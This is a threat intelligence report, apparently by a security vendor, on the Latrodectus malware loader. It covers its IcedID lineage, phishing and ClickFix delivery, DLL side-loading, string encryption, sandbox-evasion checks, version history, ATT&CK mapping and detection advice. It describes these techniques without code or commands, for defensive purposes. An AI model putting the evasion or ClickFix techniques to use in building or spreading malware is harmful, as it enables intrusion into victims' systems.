Latrodectus (also tracked as BlackWidow or Unidentified 111) is a Windows malware loader first discovered in October 2023, developed as the successor to IcedID (BokBot). Distributed primarily by threat actors TA577 and TA578, it has rapidly evolved through nine versions and infected an estimated 44,000+ systems despite surviving two rounds of the international Operation Endgame takedown.
Overview & Origins
Latrodectus emerged as IcedID's operational infrastructure was being wound down. Code analysis by Proofpoint and Team Cymru revealed shared developer lineage between IcedID and Latrodectus, with overlapping infrastructure and coding conventions suggesting the same development team pivoted to the new project.
Latrodectus shares critical code patterns with IcedID including similar C2 protocol structures, string obfuscation methods, and campaign ID encoding. The transition from IcedID to Latrodectus began in late 2023 as IcedID's backend was deprecated.
- Primary function: Malware loader/downloader that delivers secondary payloads (ransomware, stealers, Cobalt Strike)
- Language: C/C++ compiled as DLL; delivered via JavaScript, MSI, or ISO chains
- Distributors: TA577 (high-volume threat distributor) and TA578 (contact form/legal threat campaigns)
- Geography: Targets primarily North America, Western Europe, and Australia
Distribution & the ClickFix Technique
Traditional Delivery
- Phishing emails: Thread-hijacked replies with malicious PDF/HTML attachments T1566.001
- JavaScript chains: Obfuscated JS files download MSI packages containing Latrodectus DLLs T1059.007
- Contact form abuse: TA578 uses corporate website contact forms to send fake legal threats with malicious links T1189
ClickFix Social Engineering (2025)
In early 2025, Latrodectus campaigns adopted the ClickFix technique — displaying fake browser error pages that instruct victims to copy and paste a PowerShell command into their terminal. This bypasses traditional email attachment detection entirely.
- Fake error page: Victim visits compromised or impersonated website showing a browser update or CAPTCHA error
- Clipboard payload: Page copies a PowerShell one-liner to the user's clipboard T1059.001
- User execution: Instructions guide user to open Run dialog (Win+R) and paste the command T1204.002
- Payload chain: PowerShell downloads and executes MSI installer containing Latrodectus DLL
Technical Analysis
Execution Chain
- Stage 1: JavaScript or MSI installer drops legitimate executable + malicious DLL
- Stage 2: DLL side-loading via legitimate signed binary (e.g.,
nvidia.exe,winword.exe) T1574.002 - Stage 3: Latrodectus DLL loaded into memory, decrypts configuration, contacts C2
- Stage 4: C2 delivers secondary payloads based on victim profiling
String Obfuscation
Starting with version 1.4, Latrodectus uses AES-256 CTR mode for string encryption, replacing the earlier XOR-based obfuscation. Each encrypted string has a unique key and IV, making static analysis significantly more difficult. T1027
C2 Protocol
- HTTPS POST requests to hardcoded or dynamically generated C2 domains T1071.001
- Campaign ID: Encoded in the binary to track distribution campaigns
- Bot ID: Generated from hardware identifiers (HWID) for unique victim tracking
- Commands: Download/execute PE, download/execute DLL, execute shellcode, self-update, self-delete
Sandbox Evasion
Latrodectus employs one of the most aggressive sandbox evasion suites observed in modern loaders, checking for 75+ processes associated with analysis environments before executing its payload.
- Process enumeration: Checks for 75+ analysis/debugging tools (x64dbg, Wireshark, ProcessHacker, etc.) T1057
- MAC address validation: Compares against known VM MAC prefixes (VMware, VirtualBox, Hyper-V) T1497.001
- CPU core check: Requires minimum core count to proceed (sandboxes often have 1-2 cores)
- Memory check: Requires minimum RAM threshold
- Desktop file count: Checks for minimum number of files on desktop (real users have clutter)
- Timing checks: Uses
GetTickCountandNtDelayExecutionto detect time acceleration T1497.003
Version Evolution
| Version | Date | Key Changes |
|---|---|---|
| 1.0 | Oct 2023 | Initial release; XOR string obfuscation; basic loader functionality |
| 1.1 | Dec 2023 | Added self-deletion capability; improved C2 protocol |
| 1.2 | Feb 2024 | DLL side-loading delivery; enhanced sandbox checks |
| 1.3 | Apr 2024 | Scheduled task persistence; improved evasion |
| 1.4 | Jul 2024 | AES-256 CTR string encryption; 75+ process blacklist |
| 1.5-1.7 | Sep-Nov 2024 | Post-Endgame infrastructure rebuild; new C2 domains |
| 1.8-1.9 | Jan-Feb 2025 | ClickFix distribution; improved DGA fallback; updated evasion |
MITRE ATT&CK Mapping
| Tactic | Technique | Usage |
|---|---|---|
| Initial Access | T1566.001 Phishing Attachment | JS/HTML/PDF email attachments |
| Execution | T1204.002 Malicious File | User executes JS or MSI installer |
| Execution | T1059.001 PowerShell | ClickFix PowerShell clipboard payloads |
| Persistence | T1053.005 Scheduled Task | Scheduled task for recurring execution |
| Defense Evasion | T1574.002 DLL Side-Loading | Loads via legitimate signed executables |
| Defense Evasion | T1027 Obfuscated Files | AES-256 CTR string encryption |
| Defense Evasion | T1497.001 System Checks | VM/sandbox detection (75+ processes) |
| Discovery | T1057 Process Discovery | Enumerates running processes for analysis tools |
| C2 | T1071.001 Web Protocols | HTTPS POST to C2 servers |
| C2 | T1105 Ingress Tool Transfer | Downloads secondary payloads |
Operation Endgame
Latrodectus was targeted in both phases of Operation Endgame — the initial May 2024 takedown and a follow-up action. Despite infrastructure disruption, the malware's operators rebuilt C2 infrastructure within weeks and continued operations.
- May 2024 (Round 1): Multiple C2 servers seized; temporary disruption to distribution campaigns
- Recovery: New C2 domains registered; version 1.5 deployed with updated infrastructure
- Late 2024 (Round 2): Additional infrastructure targeted; operators adapted again
- 2025: Latrodectus remains fully operational with ClickFix delivery and version 1.9
Detection & Defense
- DLL side-loading detection: Monitor for legitimate executables loading unsigned DLLs from unexpected paths
- PowerShell monitoring: Alert on clipboard-pasted PowerShell commands from Run dialog (ClickFix indicator)
- MSI installation tracking: Log and alert on MSI installations from temp/download directories
- Process creation chains: Detect JS → msiexec → rundll32 execution chains
- Network indicators: Monitor for HTTPS POST patterns to recently registered domains with low reputation
- YARA rules: Available from Proofpoint, Elastic Security, and Team Cymru
- User training: Educate staff about ClickFix attacks — legitimate sites never ask users to paste commands
Defend Against Advanced Loader Threats
Mjolnir Security provides detection and response capabilities against Latrodectus, IcedID successors, and emerging loader families.
- Loader & Dropper Detection Behavioral detection of DLL side-loading chains, ClickFix execution patterns, and Latrodectus sandbox evasion techniques within your environment.
- Phishing Campaign Analysis Proactive analysis of thread-hijacked emails, contact form abuse campaigns, and social engineering techniques targeting your organization.
- 24/7 Incident Response Rapid containment when loader activity is detected before ransomware deployment. Call +1 833 403 5875.
Stay ahead of emerging threats. Get notified when we publish new intelligence reports and advisories.
Subscribe to Alerts